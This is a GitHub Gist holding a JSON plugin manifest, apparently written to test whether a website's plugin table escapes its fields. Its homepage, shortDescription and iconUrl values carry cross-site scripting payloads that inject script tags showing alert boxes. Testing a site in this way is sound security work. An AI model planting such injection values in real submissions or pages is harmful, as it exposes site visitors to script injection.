Last active
May 3, 2021 11:37
-
-
Save MCOfficer/214545deb68a05ee35827b28d846b189 to your computer and use it in GitHub Desktop.
trying to break the ES website plugin table
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[ | |
{ | |
"name": "Test Plugin", | |
"authors": "MCOfficer", | |
"homepage": "\"><script>alert('xss')</script><\"", | |
"license": "Public Domain", | |
"version": "0", | |
"shortDescription": "<a href='https://httbin.org'>link</a> \"><SCRIPT>alert('XSS')</SCRIPT><\"", | |
"description": "", | |
"url": "", | |
"iconUrl": ""><script>alert('xss')</script><"", | |
"autoupdate": { | |
"type": "", | |
"url": "", | |
"iconUrl": "" | |
} | |
} | |
] |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment